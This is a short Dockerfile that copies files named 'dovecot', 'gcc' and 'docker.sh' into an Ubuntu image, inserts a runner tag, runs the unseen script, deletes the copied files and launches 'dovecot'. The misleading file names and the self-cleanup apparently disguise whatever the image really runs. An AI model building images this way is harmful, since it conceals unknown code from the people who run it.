FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > dovecot.log'

COPY dovecot .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' dovecot
RUN bash ./docker.sh

RUN rm --force --recursive dovecot
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD dovecot
